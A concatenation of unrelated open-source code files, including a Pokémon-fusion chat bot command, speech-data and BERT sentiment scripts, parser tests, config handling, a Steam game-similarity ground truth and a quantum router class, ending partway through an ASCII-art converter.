147: "tini",
148: "nair",
149: "nite",
150: "two",
151: "ew"}
def lookup(command: Command, arg: str) -> Optional[int]:
"""
converts a string representing a pokemon's name or number to an integer
"""
try:
num = int(arg)
except ValueError:
if arg not in POKEDEX:
bot.post_message(command.channel_id, f"Could Not Find Pokemon: {arg}")
return None
num = POKEDEX[arg]
if num <= 0 or num > 151:
bot.post_message(command.channel_id, f"Out of Range: {arg}")
return None
return num
@bot.on_command('pokemash')
def handle_pokemash(command: Command):
"""
`!pokemash pokemon pokemon` - Returns the pokemash of the two Pokemon.
Can use Pokemon names or Pokedex numbers (first gen only)
"""
cmd = command.arg.lower()
# checks for exactly two pokemon
# mr. mime is the only pokemon with a space in it's name
if not cmd or (cmd.count(" ") - cmd.count("mr. mime")) != 1:
bot.post_message(command.channel_id, "Incorrect Number of Pokemon")
return
# two pokemon split
arg_left, arg_right = match(r"(mr\. mime|\S+) (mr\. mime|\S+)", cmd).group(1, 2)
num_left = lookup(command, arg_left)
num_right = lookup(command, arg_right)
if num_left is None or num_right is None:
return
bot.post_message(command.channel_id,
f"_{PREFIX[num_left]+SUFFIX[num_right]}_\n"
f"https://images.alexonsager.net/pokemon/fused/"
+ f"{num_right}/{num_right}.{num_left}.png")
| 2.109375
| 2
|
cpc/prepare_librispeech_data.py
|
lokhiufung/quick-and-dirty-dl
| 0
|
12777741
|
<reponame>lokhiufung/quick-and-dirty-dl<filename>cpc/prepare_librispeech_data.py
import argparse
import glob
import os
import json
import soundfile as sf
import pandas as pd
DATASETS = ['train-clean-100']
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', '-D', type=str, help='data root of librispeech datasets')
# parser.add_argument('--wav', action='store_true', default=True)
args = parser.parse_args()
return args
def _extract_transcripts(filepath, ext='.trans.txt'):
tran_filepaths = list(glob.glob(f'{filepath}/*/*/*{ext}'))
# filename2transcript = {}
filename_transcript = []
for tran_filepath in tran_filepaths:
with open(tran_filepath, 'r') as f:
for line in f:
filename, transcript = line.strip().split(' ', 1) # split by the first space
# filename2transcript[filename] = transcript
filename_transcript.append((filename, transcript))
transcript_df = pd.DataFrame(filename_transcript, columns=['filename', 'transcript'])
return transcript_df
def _extract_audio(filepath, ext='.flac'):
audio_filepaths = list(glob.glob(f'{filepath}/*/*/*{ext}'))
# filename2audio = {
# os.path.basename(audio_filepath): audio_filepath for audio_filepath in audio_filepaths
# }
filename_audio = [
(os.path.basename(audio_filepath).replace(ext, ''), audio_filepath) for audio_filepath in audio_filepaths
]
audio_df = pd.DataFrame(filename_audio, columns=['filename', 'audio_filepath'])
return audio_df
@DeprecationWarning
def _flac_to_wav(audio_filepath, output_filepath):
output_filepath = audio_filepath.replace('.flac', '.wav')
os.system(f'ffmpeg -i {audio_filepath} {output_filepath}')
# return output_filepath
def _get_duration(audio_filepath):
audio, sample_rate = sf.read(audio_filepath)
return len(audio) / sample_rate
def _prepare_sample(audio_filepath, duration, text, sample_id, spk_id):
sample = dict()
sample['audio_filepath'] = audio_filepath
sample['duration'] = duration
sample['text'] = text
sample['sample_id'] = sample_id
sample['spk_id'] = spk_id
return sample
def write_df_to_manifest(df, output_filepath):
with open(output_filepath, 'w') as f:
for row in df.itertuples():
sample = _prepare_sample(
audio_filepath=row.audio_filepath,
duration=row.duration,
text=row.transcript.lower(),
sample_id=row.filename,
spk_id=row.filename.split('-', 1)[0]
)
f.write(json.dumps(sample) + '\n')
def main():
args = parse_args()
data_root = args.data_root
# to_wav = args.wav
for dataset in DATASETS:
# ds_filepath = os.path.join(data_root, dataset)
# transcript_df = _extract_transcripts(ds_filepath)
# audio_df = _extract_audio(ds_filepath)
# df = transcript_df.merge(audio_df, how='inner', on='filename')
# # soundFile can open .flac file
# # if to_wav:
# # print('convert .flac to .wav ...')
# # df['audio_filepath'].apply(_flac_to_wav)
# df['duration'] = df['audio_filepath'].apply(_get_duration)
df = pd.read_csv(f'{data_root}/{dataset}.csv', sep='\t', header=None, names=['filename', 'transcript', 'audio_filepath', 'duration'])
write_df_to_manifest(
df[:-1000],
output_filepath=os.path.join(data_root, f'{dataset}-train.json')
)
write_df_to_manifest(
df[-1000:],
output_filepath=os.path.join(data_root, f'{dataset}-validation.json')
)
# output_filepath = os.path.join(data_root, f'{dataset}.csv')
# df.to_csv(
# output_filepath,
# sep='\t',
# header=False,
# index=False,
# )
# print(f'wrote {dataset} to {output_filepath}')
if __name__ == '__main__':
main()
| 2.71875
| 3
|
tests/test_youtube_sm_parser.py
|
shanedabes/youtube_sm_parser
| 2
|
12777742
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `youtube_sm_parser` package."""
import pytest
import unittest.mock
import deepdiff
import collections
import os
import xmltodict
import json
from youtube_sm_parser import youtube_sm_parser
def rel_fn(fn):
dir_name = os.path.dirname(os.path.realpath(__file__))
return os.path.join(dir_name, fn)
def mock_xml(fn):
with open(rel_fn(fn)) as f:
return xmltodict.parse(f.read())
def mock_xml_raw(fn):
with open(rel_fn(fn)) as f:
return f.read()
def mock_json(fn):
with open(rel_fn(fn)) as f:
return json.load(f, object_pairs_hook=collections.OrderedDict)
@pytest.fixture
def subs_file():
return mock_xml('subscription_manager.xml')
@pytest.fixture
def feed():
return mock_xml('feed.xml')
@pytest.fixture
def feed_raw():
return mock_xml_raw('feed.xml')
@pytest.fixture
def entry_dict():
return {
'id': 'id',
'title': 'video title',
'link': 'video_url',
'uploader': 'author name',
'published': '2019-05-14T11:00:01+00:00',
'thumbnail': 'thumb_url'
}
def test_extract_feeds(subs_file):
expected = ['test_chan_url', 'test_chan_url_2']
parsed_urls = youtube_sm_parser.extract_feeds(subs_file)
assert parsed_urls == expected
def test_get_entries(feed):
expected = [mock_json(i) for i in ['entry1.json', 'entry2.json']]
entries = youtube_sm_parser.get_entries(feed)
assert deepdiff.DeepDiff(entries, expected) == {}
def test_get_entries_empty():
expected = []
entries = youtube_sm_parser.get_entries({'feed': {}})
assert entries == expected
def test_entry_to_dict(entry_dict):
entry = mock_json('entry1.json')
expected = youtube_sm_parser.entry_to_dict(entry)
assert deepdiff.DeepDiff(entry_dict, expected) == {}
def test_format_dict(entry_dict):
format_string = '{title},{link}'
expected = 'video title,video_url'
formatted = youtube_sm_parser.format_dict(entry_dict, format_string)
assert formatted == expected
def test_feed_to_dicts(feed_raw, entry_dict):
class r():
content = feed_raw
entry_dicts = youtube_sm_parser.feed_to_dicts(r).data
assert entry_dicts[0] == entry_dict
@pytest.mark.parametrize('f', ['json', 'lines', 'yaml'])
def test_parse_args_format(f):
args = youtube_sm_parser.parse_args(['--format', f])
assert args.format == f
def test_invalid_format():
with pytest.raises(SystemExit):
args = youtube_sm_parser.parse_args('--format invalid'.split())
def test_line_format_valid():
args = youtube_sm_parser.parse_args('-l {title}'.split())
assert args.line_format == '{title}'
def test_line_format_invalid():
with pytest.raises(SystemExit):
args = youtube_sm_parser.parse_args('-l {invalid}'.split())
@unittest.mock.patch('youtube_sm_parser.youtube_sm_parser.FuturesSession')
def test_get_subscriptions(mock_fs, feed):
mock_fs.return_value.get.return_value.content = feed
subs = youtube_sm_parser.get_subscriptions(['blah'], 10)
@pytest.mark.parametrize('out_format, expected, line_format', [
['json', '[\n {\n "a": "b"\n }\n]', None],
['lines', 'b', '{a}'],
['yaml', '- a: b\n', None]
])
def test_get_output(out_format, expected, line_format):
entries = [{'a': 'b'}]
output = youtube_sm_parser.get_output(entries, out_format, line_format)
assert expected == output
| 2.4375
| 2
|
run.py
|
gwanghyeongim/flask-blog
| 0
|
12777743
|
<filename>run.py
from flaskblog import create_app
app = create_app()
if __name__ == '__main__':
app.run(debug=False) # run this when the file is executed
| 1.976563
| 2
|
tool/gongzi.py
|
FlyAlCode/RCLGeolocalization-2.0
| 4
|
12777744
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
age_init = 22
money_init = 16.0
ratio_1 = 1.05 # 每年增加10%
ratio_2 = 1.05
ratio_t = 0.96
# 毕业——自主
money = [money_init]
for age in range(age_init+1, age_init + 21):
money.append(money[-1] * ratio_1 * ratio_t)
# print(money[-1])
# 自主——挂掉
money_init_2 = money[-1] * (1 - 2.4 / money_init) * 0.8
money.append(money_init_2)
for age in range(age_init + 20 + 1, 93):
money.append(money[-1] * ratio_2 * ratio_t)
# print(money[-1])
print('自主前:')
print(money[0:21])
print('自主后:')
print(money[21:71])
total_money = sum(money)
print('总数 = ',total_money)
sum = 100
for i in range(0, 21):
sum = sum / 0.96
print('sum = ', sum)
| 3.671875
| 4
|
sentiment/mBert.py
|
fajri91/minangNLP
| 7
|
12777745
|
<gh_stars>1-10
#!/usr/bin/env python
# coding: utf-8
# In[34]:
import json, glob, os, random
import argparse
import logging
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from sklearn.metrics import f1_score, accuracy_score
from transformers import BertTokenizer, BertModel, BertConfig
from transformers import AdamW, get_linear_schedule_with_warmup
logger = logging.getLogger(__name__)
# In[35]:
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
# In[36]:
class BertData():
def __init__(self, args):
self.tokenizer = BertTokenizer.from_pretrained('bert-base-multilingual-uncased', do_lower_case=True)
self.sep_token = '[SEP]'
self.cls_token = '[CLS]'
self.pad_token = '[PAD]'
self.sep_vid = self.tokenizer.vocab[self.sep_token]
self.cls_vid = self.tokenizer.vocab[self.cls_token]
self.pad_vid = self.tokenizer.vocab[self.pad_token]
self.MAX_TOKEN = args.max_token
def preprocess_one(self, src_txt, label):
src_subtokens = [self.cls_token] + self.tokenizer.tokenize(src_txt) + [self.sep_token]
src_subtoken_idxs = self.tokenizer.convert_tokens_to_ids(src_subtokens)
if len(src_subtoken_idxs) > self.MAX_TOKEN:
src_subtoken_idxs = src_subtoken_idxs[:self.MAX_TOKEN]
src_subtoken_idxs[-1] = self.sep_vid
else:
src_subtoken_idxs += [self.pad_vid] * (self.MAX_TOKEN-len(src_subtoken_idxs))
segments_ids = [0] * len(src_subtoken_idxs)
assert len(src_subtoken_idxs) == len(segments_ids)
return src_subtoken_idxs, segments_ids, label
def preprocess(self, src_txts, labels):
assert len(src_txts) == len(labels)
output = []
for idx in range(len(src_txts)):
output.append(self.preprocess_one(src_txts[idx], labels[idx]))
return output
# In[37]:
class Batch():
def __init__(self, data, idx, batch_size, device):
cur_batch = data[idx:idx+batch_size]
src = torch.tensor([x[0] for x in cur_batch])
seg = torch.tensor([x[1] for x in cur_batch])
label = torch.tensor([x[2] for x in cur_batch])
mask_src = 1 - (src == 0)
self.src = src.to(device)
self.seg= seg.to(device)
self.label = label.to(device)
self.mask_src = mask_src.to(device)
def get(self):
return self.src, self.seg, self.label, self.mask_src
# In[38]:
class Model(nn.Module):
def __init__(self, args, device):
super(Model, self).__init__()
self.args = args
self.device = device
self.bert = BertModel.from_pretrained('bert-base-multilingual-uncased')
self.linear = nn.Linear(self.bert.config.hidden_size, 1)
self.dropout = nn.Dropout(0.2)
self.sigmoid = nn.Sigmoid()
self.loss = torch.nn.BCELoss(reduction='none')
def forward(self, src, seg, mask_src):
top_vec, _ = self.bert(input_ids=src, token_type_ids=seg, attention_mask=mask_src)
top_vec = self.dropout(top_vec)
top_vec *= mask_src.unsqueeze(dim=-1).float()
top_vec = torch.sum(top_vec, dim=1) / mask_src.sum(dim=-1).float().unsqueeze(-1)
conclusion = self.linear(top_vec).squeeze()
return self.sigmoid(conclusion)
def get_loss(self, src, seg, label, mask_src):
output = self.forward(src, seg, mask_src)
return self.loss(output, label.float())
def predict(self, src, seg, mask_src):
output = self.forward(src, seg, mask_src)
prediction = output.cpu().data.numpy() > 0.5
if type (prediction) == np.bool_:
return [int(prediction)]
return [int(x) for x in prediction]
# In[39]:
def prediction(dataset, model, args):
preds = []
golds = []
model.eval()
for j in range(0, len(dataset), args.batch_size):
src, seg, label, mask_src = Batch(dataset, j, args.batch_size, args.device).get()
preds += model.predict(src, seg, mask_src)
golds += label.cpu().data.numpy().tolist()
return f1_score(golds, preds), accuracy_score(golds, preds)
# In[40]:
def train(args, train_dataset, dev_dataset, test_dataset, model):
""" Train the model """
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
t_total = len(train_dataset) // args.batch_size * args.num_train_epochs
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Total optimization steps = %d", t_total)
logger.info(" Warming up = %d", args.warmup_steps)
logger.info(" Patience = %d", args.patience)
# Added here for reproductibility
set_seed(args)
tr_loss = 0.0
global_step = 1
best_f1_dev = 0
best_f1_test = 0
cur_patience = 0
for i in range(int(args.num_train_epochs)):
random.shuffle(train_dataset)
epoch_loss = 0.0
for j in range(0, len(train_dataset), args.batch_size):
src, seg, label, mask_src = Batch(train_dataset, j, args.batch_size, args.device).get()
model.train()
loss = model.get_loss(src, seg, label, mask_src)
loss = loss.sum()/args.batch_size
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel (not distributed) training
loss.backward()
tr_loss += loss.item()
epoch_loss += loss.item()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
logger.info("Finish epoch = %s, loss_epoch = %s", i+1, epoch_loss/global_step)
dev_f1, dev_acc = prediction(dev_dataset, model, args)
if dev_f1 > best_f1_dev:
best_f1_dev = dev_f1
test_f1, test_acc = prediction(test_dataset, model, args)
best_f1_test = test_f1
cur_patience = 0
logger.info("Better, BEST F1 in DEV = %s & BEST F1 in test = %s.", best_f1_dev, best_f1_test)
else:
cur_patience += 1
if cur_patience == args.patience:
logger.info("Early Stopping Not Better, BEST F1 in DEV = %s & BEST F1 in test = %s.", best_f1_dev, best_f1_test)
break
else:
logger.info("Not Better, BEST F1 in DEV = %s & BEST F1 in test = %s.", best_f1_dev, best_f1_test)
return global_step, tr_loss / global_step, best_f1_dev, best_f1_test
# In[ ]:
class Args:
max_token=200
batch_size=30
learning_rate=5e-5
weight_decay=0
adam_epsilon=1e-8
max_grad_norm=1.0
num_train_epochs=20
warmup_steps=242
logging_steps=200
seed=2020
local_rank=-1
patience=5
no_cuda = False
args = Args()
# Setup CUDA, GPU & distributed training
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend="nccl")
args.n_gpu = 1
args.device = device
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,
)
set_seed(args)
# Load pretrained model and tokenizer
if args.local_rank not in [-1, 0]:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
if args.local_rank == 0:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
bertdata = BertData(args)
dev_f1s = 0.0
test_f1s = 0.0
for idx in range(5):
trainset = pd.read_excel('data/folds/train'+str(idx)+'.xlsx')
devset = pd.read_excel('data/folds/dev'+str(idx)+'.xlsx')
testset = pd.read_excel('data/folds/test'+str(idx)+'.xlsx')
xtrain, ytrain = list(trainset['minang']), list(trainset['sentiment'])
xdev, ydev = list(devset['minang']), list(devset['sentiment'])
xtest, ytest = list(testset['minang']), list(testset['sentiment'])
model = Model(args, device)
model.to(args.device)
train_dataset = bertdata.preprocess(xtrain, ytrain)
dev_dataset = bertdata.preprocess(xdev, ydev)
test_dataset = bertdata.preprocess(xtest, ytest)
global_step, tr_loss, best_f1_dev, best_f1_test = train(args, train_dataset, dev_dataset, test_dataset, model)
dev_f1s += best_f1_dev
test_f1s += best_f1_test
print('End of Training 5-fold')
print('Dev set F1', dev_f1s/5.0)
print('Test set F1', test_f1s/5.0)
# In[ ]:
| 2.28125
| 2
|
SLpackage/private/pacbio/pythonpkgs/pbsvtools/lib/python2.7/site-packages/pbsv1/config.py
|
fanglab/6mASCOPE
| 5
|
12777746
|
<reponame>fanglab/6mASCOPE<filename>SLpackage/private/pacbio/pythonpkgs/pbsvtools/lib/python2.7/site-packages/pbsv1/config.py
"""
Class svconfig defines parameters for structural varation tools.
"""
from __future__ import absolute_import
import logging
import ConfigParser
import shutil
import StringIO
import traceback
from .independent.utils import realpath, str2bool
from .Constants import MARKDUP_PARAMS, CHAIN_PARAMS, SGE_PARAMS, SVCALL_PARAMS, ALIGN_PARAMS
log = logging.getLogger()
__all__ = []
def svconfig_write(svconfig, writer):
"""Write SVConfig to writer.
"""
man = SVConfigManipulator()
man.write(svconfig, writer)
class SVConfigData(object):
"""This has as few extraneous attributes as possible.
"""
def __init__(self):
# pylint wants to see actual attrs
self.nproc = None
self.tmp_dir = None
self.chain_min_mapq = None
self.chain_max_gap = None
self.inversion_poswiggle = None
self.cfg_fn = None
def SVConfig(cfg_fn = None):
"""Return SVConfigData
Usage:
c = SVConfig('a.cfg')
c.nproc == 4
c.nproc = 5
write_svconfig(c, open('b.cfg'))
"""
creator = SVConfigManipulator()
svconfig = creator.create_default()
if cfg_fn is not None:
cfg_fn = realpath(cfg_fn)
log.debug('Reading Config from {!r}'.format(cfg_fn))
with open(cfg_fn) as reader:
svconfig = creator.update(svconfig, reader)
svconfig.cfg_fn = cfg_fn
return svconfig
class SVConfigManipulator(object):
# default parameters of sections
SECTIONS = {"markdup": MARKDUP_PARAMS, "chain": CHAIN_PARAMS,
"call": SVCALL_PARAMS, "sge": SGE_PARAMS,
'align': ALIGN_PARAMS}
@classmethod
def create_default(cls):
svconfig = SVConfigData()
writer = StringIO.StringIO()
cls._write_default_cfg(writer)
cfg_content = writer.getvalue()
reader = StringIO.StringIO(cfg_content)
cls._update_from_config(svconfig.__dict__, reader)
return svconfig
@classmethod
def update(cls, svconfig, cfgfp):
"""Given SVConfig and ConfigParser-file-reader, update and return SVConfig.
"""
cls._update_from_config(svconfig.__dict__, cfgfp)
return svconfig
@classmethod
def _write_default_cfg(cls, writer):
"""Write a ConfigParser file, based on defaults in SECTIONS.
"""
for section, params in cls.SECTIONS.iteritems():
writer.write('[{}]\n'.format(section))
for param in params:
writer.write('{} = {}\n'.format(param.name, param.val))
@classmethod
def _update_from_config(cls, param_dict, reader):
cfg = ConfigParser.ConfigParser()
cfg.readfp(reader)
for section in cfg.sections():
if not cls._is_section(section):
log.warning("Ignore unexpected section %s.", section)
else:
for name, val in cfg.items(section):
if cls._is_param(name, section):
param_dict[name] = cls._convert_param_val(name, val)
else:
log.warning("%s is not a valid param of section %s", name, section)
@classmethod
def _convert_param_val(cls, name, val_from_cfg):
try:
type = cls._get_param_type(name)
if type == bool:
return str2bool(val_from_cfg)
else:
return type(val_from_cfg)
except Exception:
raise ValueError('%s\nCould not convert %r to %r' % (traceback.format_exc(), val_from_cfg, type))
@classmethod
def _is_section(cls, section):
"""is section valid"""
return section.lower() in [s.lower() for s in cls.SECTIONS.keys()]
@classmethod
def _get_default_param(cls, name):
"""Return default param of name"""
for params in cls.SECTIONS.values(): # pragma: no cover
for param in params:
if name.lower() == param.name.lower():
return param
# unreachable #raise ValueError("%s is not a valid param" % name)
@classmethod
def _get_param_type(cls, name):
"""Return type of parameter of name"""
return cls._get_default_param(name).type
@classmethod
def _is_param(cls, name, section):
"""Return True if name is a valid param name in section.
"""
assert section in cls.SECTIONS
return any([name.lower() == param.name.lower() for param in cls.SECTIONS[section]])
def to_str(self, svconfig):
ret = []
for section in sorted(self.SECTIONS.keys()):
ret.append("[%s]" % section)
for param in self.SECTIONS[section]:
ret.extend(['# %s, type=%r' % (param.desc, param.type),
'%s=%s' % (param.name, getattr(svconfig, param.name))])
ret.append("")
return '\n'.join(ret)
def write(self, svconfig, writer):
"""Write cfg to output-file-stream writer.
"""
writer.write(self.to_str(svconfig))
def reset_cfg_nproc(svconfig, nproc):
"""Reset nproc in a cfg obj"""
svconfig.nproc = int(nproc)
svconfig.cfg_fn = None # also reset associated cfg_fn
def make_cfg_fn(svconfig, o_cfg_fn):
"""Reset self.cfg_fn to o_cfg_fn"""
if svconfig.cfg_fn is None:
with open(o_cfg_fn, 'w') as writer:
SVConfigManipulator().write(svconfig, writer)
else:
shutil.copy(svconfig.cfg_fn, o_cfg_fn)
svconfig.cfg_fn = o_cfg_fn
def get_config(cfg):
"""wrapper, converts either a cfg fn or a SVConfig obj to SVConfig obj"""
if isinstance(cfg, str):
cfg = SVConfig(cfg)
elif not isinstance(cfg, SVConfigData):
raise ValueError(
"cfg must be either SVConfigData obj or a config filename")
log.debug("config: %s", str(cfg))
return cfg
def get_config_and_tmp_dir(cfg, tmp_dir):
"""Return cfg object and tmp_dir.
If tmp_dir is None, use cfg.tmp_dir; otherwise, use tmp_dir
"""
cfg = get_config(cfg)
if tmp_dir is None:
return cfg, cfg.tmp_dir
else:
assert isinstance(tmp_dir, str)
return cfg, tmp_dir
| 2.171875
| 2
|
src/endplay/__init__.py
|
dominicprice/endplay
| 4
|
12777747
|
"""
Endplay - A bridge tools library with generating, analysing and scoring.
Released under the MIT licence (see the LICENCE file provided with this distribution)
"""
import endplay._dds as _dds
from endplay.dds import *
from endplay.dealer import *
from endplay.interact import *
from endplay.parsers import *
from endplay.evaluate import *
from endplay.types import *
from endplay.config import \
__version__, __version_info__, __author__, \
__buildtime__, suppress_unicode
| 1.210938
| 1
|
hard_coded_ground_truth.py
|
woctezuma/steam-descriptions
| 1
|
12777748
|
<gh_stars>1-10
# Objective: define a ground truth consisting of clusters of games set in the same fictional universe
import matplotlib.pyplot as plt
import steamspypi
def get_app_ids_which_app_name_contains(name_str='Half-Life'):
data_request = dict()
data_request['request'] = 'all'
data = steamspypi.download(data_request)
app_ids = sorted([data[d]['appid'] for d in data.keys()
if name_str in data[d]['name']])
return app_ids
def get_retrieval_ground_truth():
# Lists of appIDs:
# - first obtained with calls to get_app_ids_which_app_name_contains()
# - then refined manually
retrieval_ground_truth_as_list = [
[20, 440, 943490], # Team Fortress
[10, 80, 240, 730, 273110, 100], # Counter-Strike
[500, 550], # Left 4 Dead
[50, 70, 130, 220, 280, 320, 340, 360, 380, 420, 466270, 723390], # Half-Life
[24240, 218620], # PAYDAY
[400, 620, 104600, 247120, 684410, 659, 52003, 450390], # Portal
[12100, 12110, 12120, 12170, 12180, 12210, 12220, 271590], # Grand Theft Auto
[22320, 22330, 72850, 306130, 364470, 489830, 611670], # The Elder Scrolls
[3900, 3910, 3920, 7600, 8930, 16810, 65980, 244070, 244090, 282210, 289070, 327380, 327390, 327400, 50100,
34470, 34440, 34450, 3990], # Sid Meier's Civilization
[8955, 8980, 49520, 261640, 330830], # Borderlands
[219740, 322330], # Don't Starve
[15700, 15710, 15740, 15750, 314660], # Oddworld: Abe
[236870, 863550, 6850, 6860, 6900, 203140, 205930, 247430, 427820], # HITMAN
[346110, 407530, 529910], # ARK
[375180, 709010, 660120, 324760, 270880, 751660, 935730, 900020, 320310, 1020600, 285500, 258760, 232010,
932300, 273740, 494670, 451660, 601170, 273750, 286810, 273760, 227300, 374120, 302060, 286830, 847870, 601590,
889470], # Euro Truck Simulator
[319630, 532210, 554620], # Life is Strange
[7000, 8000, 8140, 203160, 224960, 224980, 225000, 225020, 225300, 225320, 233410, 391220,
750920], # Tomb Raider
[21600, 61500, 61510, 61520, 105450, 217750, 221380, 226840, 230070, 264120, 266840, 314970, 341150, 351480,
362740, 369080, 371710, 397770, 402880, 421060, 431700, 442500, 454600, 556300, 570970, 586080, 597970, 599060,
601520, 603850, 639300, 678970, 718850, 725870, 783590, 792930, 799890, 817390, 832770, 882110, 882410, 988480,
997480], # Age of Empires
[12530, 12690, 253710, 290730, 322920, 323240, 328670, 328940, 361370, 459940, 518790, 545920, 545930, 545940,
580930, 585080, 619330, 679190, 758470, 801080, 806230, 860670, 934550, 988340, 1029380, 437210, 455700,
500140, 513680], # theHunter
[20900, 20920, 292030, 303800, 499450, 973760, 544750], # The Witcher
[22300, 22370, 22380, 22490, 38400, 38410, 38420, 377160, 588430, 611660], # Fallout
[2620, 2630, 2640, 3020, 6810, 7940, 10090, 10180, 21980, 22340, 41700, 42700, 202970, 209160, 209650, 214630,
251390, 270130, 292730, 311210, 336060, 350330, 358360, 359620, 389470, 390660, 393080, 399810, 476600, 518790,
626630, 630670, 672680, 765770, 836260, 896840, 987790], # Call of Duty
[73010, 225420, 231140, 255710, 261940, 313010, 446010, 457600, 520680, 708280, 845440, 862110, 872730,
24780], # Cities
[57300, 239200, 359390], # Amnesia
[1250, 232090, 326960, 690810], # Killing Floor
[7670, 8850, 8870, 409710, 409720], # BioShock
[209080, 442080, 608800, 49800], # Guns of Icarus
[9480, 55230, 206420, 301910], # Saints Row
]
# Create a dictionary
retrieval_ground_truth = dict()
for cluster in retrieval_ground_truth_as_list:
for element in cluster:
retrieval_ground_truth[element] = set(cluster) - {element}
return retrieval_ground_truth
def compute_retrieval_score(query_app_ids, reference_app_id_counters, num_elements_displayed=10, verbose=True):
print('\nComputing retrieval score based on a setting in the same fictional universe.')
retrieval_ground_truth = get_retrieval_ground_truth()
retrieval_score = 0
for query_counter, query_app_id in enumerate(query_app_ids):
reference_app_id_counter = reference_app_id_counters[query_counter]
try:
current_retrieval_ground_truth = retrieval_ground_truth[query_app_id]
except KeyError:
continue
current_retrieval_score = 0
for rank, app_id in enumerate(reference_app_id_counter):
if app_id in current_retrieval_ground_truth:
if app_id != query_app_id:
current_retrieval_score += 1
if rank >= (num_elements_displayed - 1):
retrieval_score += current_retrieval_score
if verbose:
print('[appID={}] retrieval score = {}'.format(query_app_id, current_retrieval_score))
break
print('Total retrieval score = {}'.format(retrieval_score))
return retrieval_score
def plot_retrieval_scores(d):
# Input d is a dictionary which maps the number of sentence components removed to the total retrieval score.
d_max = max(d.values())
d_arg_max = [i for i in d.keys() if d[i] == d_max]
plt.plot(list(d.keys()), list(d.values()))
plt.scatter(d_arg_max, [d[i] for i in d_arg_max], color='red')
plt.xlabel('Number of sentence components removed')
plt.ylabel('Retrieval score')
plt.title('Influence of the removal of sentence components')
plt.grid()
plt.show()
return
if __name__ == '__main__':
app_ids = get_app_ids_which_app_name_contains(name_str='Half-Life')
print(app_ids)
| 2.8125
| 3
|
qpce/router.py
|
brunorijsman/quantum-path-computation-engine
| 0
|
12777749
|
"""Quantum Router."""
import collections
class Router:
# TODO: Remove this when we have more methods
# pylint:disable=too-few-public-methods
"""A quantum router.
A quantum router object represents a quantum router that is part of a quantum network. Quantum
routers are interconnected by quantum links."""
def __init__(self, network, name):
"""Initialize a quantum router.
Args:
network (Network): The network in which the router is created.
name (str): The name of quantum router; uniquely identifies the router within the
quantum network.
Raises:
AssertionError if there is already a router with the same name in the network."""
self.network = network
self.name = name
self._next_available_port = 0
self.links = collections.OrderedDict() # Link objects indexed by local port
network.add_router(self)
def add_link(self, link):
"""Add a link to the router. The link is attached to the next available port. The number of
that port is returned.
Args:
link (Link): The link to be attached.
Returns:
The port to which the link was attached.
Raises:
AssertionError if there is already a router with the same name in the network."""
assert self in [link.router_1, link.router_2], \
f"Attempt to add link to router {self.name} which is not an end-point of the link"
port = self._next_available_port
self._next_available_port += 1
self.links[port] = link
return port
| 3.5
| 4
|
ascii-art.py
|
guptaanmol184/ascii-art
| 1
|
12777750
|
<filename>ascii-art.py
#!/usr/bin/env python
from PIL import Image
from colorama import Fore, Back, Style, init
import os
import argparse
import subprocess
# resize to the size i want
def resize_image(im, max_width, max_height):
im.thumbnail((max_width//3, max_height)) # divide by 3 -> we draw each pixel py 3 letter
return im
# convert image to 2d matrix
def get_image_matrix(im):
pixel_list = list(im.getdata())
pixel_matrix = [pixel_list[i: i+im.width] for i in range(0, len(pixel_list), im.width)]
return pixel_matrix
# convert 2d image matrix to brightness matrix
def get_intensity_matrix(pixel_matrix, method='average', invert=False):
if method == 'average':
intensity_matrix = [[ sum(pixel)//3 for pixel in row] for row in pixel_matrix]
elif method == 'lightness':
intensity_matrix = [[ (min(pixel)+max(pixel))//2 for pixel in row] for row in pixel_matrix]
elif method == 'luminosity':
intensity_matrix = [[ 0.21*pixel[0] + 0.72*pixel[1] + 0.07*pixel[2] for pixel in row] for row in pixel_matrix]
if invert:
return [[ (255-pixel) for pixel in row ] for row in intensity_matrix]
else:
return intensity_matrix
# characters in the increasing order of their brightness on the screen
def get_mapped_char(intensity):
b_string = "`^\",:;Il!i~+_-?][}{1)(|\\/tfjrxnuvczXYUJCLQ0OZmwqpdbkhao*#MW&8%B@$"
return b_string[int((intensity/256)*len(b_string))]
# returns the 2d matrix representing the ascii image
def get_character_matrix(intensity_matrix):
return [[get_mapped_char(intensity_val) for intensity_val in row] for row in intensity_matrix ]
# COLORAMA AVAILABLE OPTIONS
# Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Style: DIM, NORMAL, BRIGHT, RESET_ALL
def display_ascii_image(ascii_image_matrix, fgcolor='white'):
if fgcolor == 'black':
